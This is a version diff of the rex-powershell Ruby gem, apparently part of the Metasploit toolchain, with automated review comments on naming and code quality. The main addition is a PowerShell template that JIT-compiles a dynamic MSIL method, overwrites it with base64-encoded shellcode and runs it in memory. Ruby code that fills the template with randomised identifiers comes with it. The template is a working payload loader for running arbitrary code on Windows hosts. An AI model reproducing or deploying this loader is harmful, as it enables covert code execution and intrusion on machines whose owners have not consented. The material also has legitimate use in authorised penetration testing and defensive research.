rex-powershell 0.1.74 → 0.1.75

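--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA1:
- metadata.gz: b88e31ce42aa0f6b8b9849c916f24680f156fb59
- data.tar.gz: '0395b6d9bf3e79c7edfaff20e36b049c5df254c7'
+ metadata.gz: 8df50450c5b08d320bbe1e4c5c8bf588ec79c379
+ data.tar.gz: ac24dc2a5d73c0fa27c8824b154b6988078fbbcf
  SHA512:
- metadata.gz: 5b295b9d04daf9e4b7d39b80ed60ecfd70392c0b45c3337ad39848482f53e5499d30a08f33e9cb72e2a2a6026ca01ce05a1046baa81e0f449e36c9fee0aedec4
- data.tar.gz: ae1d2be6edc876b9ec72a408ac466b2e5d73823a34f46c7f46e4033296d4b55730492f315706234d75723cd72107820eaa2b60aa3670825b26d0f41c95f29ded
+ metadata.gz: e881e86dc2e6766940499e636bd0465f2b592b4ef3059f005306163c60c553e5a26631775d9263284002f7f35fe6373eb2c3f4a5e3364e019536101af389ced1
+ data.tar.gz: 942aa831e1517f61b14928e3c609d9611dc453fee274336a31c8cc65fcba4f0dcb74a56637982e1376152dbad305cc30bd120b1d7df4c4e1952c95141ceb3475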
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
Binary file
@@ -0,0 +1,67 @@
1
+ function %{func_build_dyn_type}($%{var_type_name}){
2
+ $%{var_dyn_asm} = ([AppDomain]::CurrentDomain).DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($%{var_type_name})), [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
3
+ $%{var_dyn_asm}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.AllowPartiallyTrustedCallersAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
4
+ $%{var_dyn_mod} = $%{var_dyn_asm}.DefineDynamicModule($%{var_type_name})
5
+ $%{var_dyn_mod}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.UnverifiableCodeAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
6
+ return $%{var_dyn_mod}.DefineType($%{var_type_name}, [System.Reflection.TypeAttributes]::Public)
7
+ }
8
+ function %{func_get_meth_addr}($%{var_tgt_meth}){
9
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{str_addr_loc}')
10
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $(if ([IntPtr]::Size -eq 4) { [UInt32] } else { [Int64] }), $null)).GetILGenerator()
11
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldftn, [System.Reflection.MethodInfo]$%{var_tgt_meth})
12
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
13
+ return (($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')).Invoke($null, @())
14
+ }
15
+
16
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{var_src_meth}')
17
+ $%{var_args} = New-Object System.Type[](3)
18
+ $%{var_args}[0] = [IntPtr]
19
+ $%{var_args}[1] = [IntPtr]
20
+ $%{var_args}[2] = [Int32]
21
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_src_type}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $%{var_args})).GetILGenerator()
22
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
23
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1)
24
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2)
25
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Volatile)
26
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Cpblk)
27
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
28
+ $%{var_src_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_src_type}')
29
+
30
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{str_tgt_type}')
31
+ $%{var_args} = New-Object System.Type[](1)
32
+ $%{var_args}[0] = [Int]
33
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $%{var_args})).GetILGenerator()
34
+ $%{var_xor} = 0x41424344
35
+ $%{var_dyn_meth}.DeclareLocal([Int]) | Out-Null
36
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
37
+ foreach ($CodeBlock in 1..100) {
38
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
39
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
40
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Stloc_0)
41
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0)
42
+ $%{var_xor}++
43
+ }
44
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
45
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
46
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
47
+ $%{var_tgt_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')
48
+
49
+ foreach ($Exec in 1..20) { $%{var_tgt_meth}.Invoke($null, @(0x11112222)) | Out-Null }
50
+
51
+ if ( [IntPtr]::Size -eq 4 ) {
52
+ $%{var_sc} = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
53
+ } else {
54
+ $%{var_sc} = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)
55
+ }
56
+ $%{var_sc} += [System.Convert]::FromBase64String("%{b64shellcode}")
57
+ $%{var_sc_addr} = [Runtime.InteropServices.Marshal]::AllocHGlobal($%{var_sc}.Length)
58
+ [Runtime.InteropServices.Marshal]::Copy($%{var_sc}, 0, $%{var_sc_addr}, $%{var_sc}.Length)
59
+
60
+ $%{var_args} = New-Object Object[](3)
61
+ $%{var_args}[0] = [IntPtr]$(%{func_get_meth_addr} $%{var_tgt_meth})
62
+ $%{var_args}[1] = $%{var_sc_addr}
63
+ $%{var_args}[2] = $%{var_sc}.Length
64
+
65
+ $%{var_src_meth}.Invoke($null, $%{var_args})
66
+
67
+ $%{var_tgt_meth}.Invoke($null, @(0x11112222))
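Review bot: The source-side dynamic type is created with `%{func_build_dyn_type}('%{var_src_meth}')`, i.e. named by the same `var_src_meth` identifier that later becomes the PowerShell variable holding the copy method, while its method is named `'%{str_src_type}'`; the target pair is built the other way round, `'%{str_tgt_type}'` for the type and `'%{str_tgt_meth}'` for the method. The `str_`/`var_` roles are crossed on the source side only, which makes the template harder to match against the rig entries in `to_win32pe_psh_msil`. Naming the source type `'%{str_src_type}'` and its method with a dedicated `'%{str_src_meth}'` entry (added via `rig.init_var(:str_src_meth)` on the Ruby side) would keep the two halves parallel. This is naming only; the emitted script behaves the same either way.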
@@ -1,13 +1,13 @@
1
1
  # -*- coding: binary -*-
2
2
  require 'rex/powershell/version'
3
- require 'rex/powershell/templates'
4
- require 'rex/powershell/payload'
5
3
  require 'rex/powershell/output'
6
4
  require 'rex/powershell/parser'
7
5
  require 'rex/powershell/obfu'
8
- require 'rex/powershell/param'
9
6
  require 'rex/powershell/function'
7
+ require 'rex/powershell/param'
10
8
  require 'rex/powershell/script'
9
+ require 'rex/powershell/templates'
10
+ require 'rex/powershell/payload'
11
11
  require 'rex/powershell/psh_methods'
12
12
  require 'rex/powershell/command'
13
13
 
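Review bot: The new require order is load-order-sensitive but nothing in the file says so: `templates` now comes after `script` and `payload` after `templates`, which matches templates.rb reading `Rex::Powershell::Script::DEFAULT_RIG_OPTS` and payload.rb doing `include Rex::Powershell::Templates` elsewhere in this diff. A later alphabetical re-sort of these lines would fail with an uninitialized constant at load time. A one-line comment above the block, `# Order matters: templates reads Script::DEFAULT_RIG_OPTS, payload includes Templates`, would pin the dependency.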
@@ -297,7 +297,7 @@ EOS
297
297
  when 'old'
298
298
  Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
299
299
  when 'msil'
300
- fail RuntimeError, 'MSIL Powershell method no longer exists'
300
+ Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
301
301
  else
302
302
  fail RuntimeError, 'No Powershell method specified'
303
303
  end
@@ -5,15 +5,17 @@ module Rex
5
5
  module Powershell
6
6
  module Payload
7
7
 
8
+ include Rex::Powershell::Templates
9
+
8
10
  def self.read_replace_script_template(template_path, filename, hash_sub)
9
- template_pathname = File.join(template_path, filename)
10
11
  template = ''
12
+ template_pathname = File.join(template_path, filename)
11
13
  File.open(template_pathname, "rb") {|f| template = f.read}
12
14
  template % hash_sub
13
15
  end
14
16
 
15
- def self.to_win32pe_psh_net(template_path, code)
16
- rig = Rex::RandomIdentifier::Generator.new()
17
+ def self.to_win32pe_psh_net(template_path = TEMPLATE_DIR, code)
18
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
17
19
  rig.init_var(:var_code)
18
20
  rig.init_var(:var_kernel32)
19
21
  rig.init_var(:var_baseaddr)
@@ -23,6 +25,7 @@ module Payload
23
25
  rig.init_var(:var_compileParams)
24
26
  rig.init_var(:var_syscode)
25
27
  rig.init_var(:var_temp)
28
+ rig.init_var(:var_opf)
26
29
 
27
30
  hash_sub = rig.to_h
28
31
  hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
@@ -30,7 +33,7 @@ module Payload
30
33
  read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
31
34
  end
32
35
 
33
- def self.to_win32pe_psh(template_path, code)
36
+ def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
34
37
  hash_sub = {}
35
38
  hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
36
39
  hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -50,9 +53,9 @@ module Payload
50
53
  # Tweaked by shellster
51
54
  # Originally from PowerSploit
52
55
  #
53
- def self.to_win32pe_psh_reflection(template_path, code)
56
+ def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
54
57
  # Intialize rig and value names
55
- rig = Rex::RandomIdentifier::Generator.new()
58
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
56
59
  rig.init_var(:func_get_proc_address)
57
60
  rig.init_var(:func_get_delegate_type)
58
61
  rig.init_var(:var_code)
@@ -64,13 +67,43 @@ module Payload
64
67
  rig.init_var(:var_type_builder)
65
68
  rig.init_var(:var_buffer)
66
69
  rig.init_var(:var_hthread)
70
+ rig.init_var(:var_opf)
71
+
72
+ hash_sub = rig.to_h
73
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
74
+
75
+ read_replace_script_template(template_path, "to_mem_pshreflection.ps1.template",hash_sub).gsub(/(?<!\r)\n/, "\r\n")
76
+ end
77
+
78
+ #
79
+ # MSIL JIT approach as demonstrated by Matt Graeber
80
+ # http://www.exploit-monday.com/2013/04/MSILbasedShellcodeExec.html
81
+ # Referencing PowerShell Empire data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1
82
+ #
83
+ def self.to_win32pe_psh_msil(template_path = TEMPLATE_DIR, code)
84
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
85
+ rig.init_var(:func_build_dyn_type)
86
+ rig.init_var(:func_get_meth_addr)
87
+ rig.init_var(:var_type_name)
88
+ rig.init_var(:var_dyn_asm)
89
+ rig.init_var(:var_dyn_mod)
90
+ rig.init_var(:var_tgt_meth)
91
+ rig.init_var(:var_dyn_type)
92
+ rig.init_var(:var_dyn_meth)
93
+ rig.init_var(:var_args)
94
+ rig.init_var(:var_xor)
95
+ rig.init_var(:var_sc_addr)
96
+ rig.init_var(:var_sc)
97
+ rig.init_var(:var_src_meth)
98
+ rig.init_var(:str_addr_loc)
99
+ rig.init_var(:str_tgt_meth)
100
+ rig.init_var(:str_src_type)
101
+ rig.init_var(:str_tgt_type)
67
102
 
68
103
  hash_sub = rig.to_h
69
104
  hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
70
105
 
71
- read_replace_script_template(template_path,
72
- "to_mem_pshreflection.ps1.template",
73
- hash_sub).gsub(/(?<!\r)\n/, "\r\n")
106
+ read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
74
107
  end
75
108
 
76
109
  end
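Review bot: `def self.to_win32pe_psh_net(template_path = TEMPLATE_DIR, code)` places the optional parameter before the required one, so the default only applies when a caller passes a single argument; a caller that passes `nil` for `template_path` (the natural shape when the value comes from an unset option) reaches `File.join(nil, filename)` in `read_replace_script_template` and raises TypeError. The same signature is used for `to_win32pe_psh`, `to_win32pe_psh_reflection` and the new `to_win32pe_psh_msil`. Keeping the signatures and adding `template_path ||= TEMPLATE_DIR` as the first line of each method covers both call shapes without changing the interface. Two smaller points: `to_win32pe_psh_msil` has no comment explaining that the `str_*` rig entries become type/method names baked into the emitted script while the `var_*` entries become PowerShell variables, and the `,hash_sub)` call in `to_win32pe_psh_reflection` is missing the space after the comma.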
@@ -1,6 +1,5 @@
1
1
  # -*- coding: binary -*-
2
2
 
3
-
4
3
  require 'forwardable'
5
4
 
6
5
  module Rex
@@ -12,6 +11,11 @@ module Powershell
12
11
  include Output
13
12
  include Parser
14
13
  include Obfu
14
+ DEFAULT_RIG_OPTS = {
15
+ max_length: 5,
16
+ min_length: 2,
17
+ forbidden: Parser::RESERVED_VARIABLE_NAMES.map {|e| e[1..-1]}
18
+ }
15
19
  # Pretend we are actually a string
16
20
  extend ::Forwardable
17
21
  # In case someone messes with String we delegate based on its instance methods
@@ -31,9 +35,9 @@ module Powershell
31
35
  :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
32
36
  :end_with?
33
37
 
34
- def initialize(code)
38
+ def initialize(code, rig = nil)
35
39
  @code = ''
36
- @rig = Rex::RandomIdentifier::Generator.new
40
+ @rig = rig || Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
37
41
 
38
42
  begin
39
43
  # Open code file for reading
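Review bot: `DEFAULT_RIG_OPTS` is a plain, unfrozen hash shared by every `Script` instance and, through the `Templates` alias elsewhere in this diff, by every `Payload` call, so an in-place modification by a consumer (a `merge!` inside `Rex::RandomIdentifier::Generator`, for example; its implementation is not visible here) would silently change the forbidden list for all later scripts. Closing the literal with `}.freeze` removes that possibility at no cost. The `forbidden:` line also deserves a why-comment, since `e[1..-1]` presumably strips a leading `$` from `Parser::RESERVED_VARIABLE_NAMES`; something like `# reserved names carry a leading sigil; the generator compares bare identifiers` (worth confirming against Parser).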
@@ -2,6 +2,9 @@ module Rex
2
2
  module Powershell
3
3
  module Templates
4
4
 
5
+ # RandomIdentifier::Generator options
6
+ DEFAULT_RIG_OPTS = Rex::Powershell::Script::DEFAULT_RIG_OPTS
7
+
5
8
  # The base directory that all Powershell script templates live in
6
9
  TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
7
10
 
@@ -14,6 +17,9 @@ module Rex
14
17
  # The powershell script template for memory injection using the old method
15
18
  TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
16
19
 
20
+ # The powershell script template for memory injection using the old method
21
+ TO_MEM_MSIL = File.join(TEMPLATE_DIR, 'to_mem_msil.ps1.template')
22
+
17
23
  end
18
24
  end
19
25
  end
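Review bot: The comment above `TO_MEM_MSIL` is a copy of the one above `TO_MEM_OLD` and describes the wrong template; it should read `# The powershell script template for memory injection using the MSIL JIT method`. Otherwise the constant is consistent with its siblings and matches the `to_mem_msil.ps1.template` file name used by `to_win32pe_psh_msil` elsewhere in this diff.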
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.74"
3
+ VERSION = "0.1.75"
4
4
  end
5
5
  end
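--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
  --- !ruby/object:Gem::Specification
  name: rex-powershell
  version: !ruby/object:Gem::Version
- version: 0.1.74
+ version: 0.1.75
  platform: ruby
  authors:
  - David 'thelightcosine' Maloney
@@ -177,6 +177,7 @@ files:
  - README.md
  - Rakefile
  - data/templates/to_mem_dotnet.ps1.template
+ - data/templates/to_mem_msil.ps1.template
  - data/templates/to_mem_old.ps1.template
  - data/templates/to_mem_pshreflection.ps1.template
  - lib/rex/powershell.rb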
metadata.gz.sig CHANGED
Binary file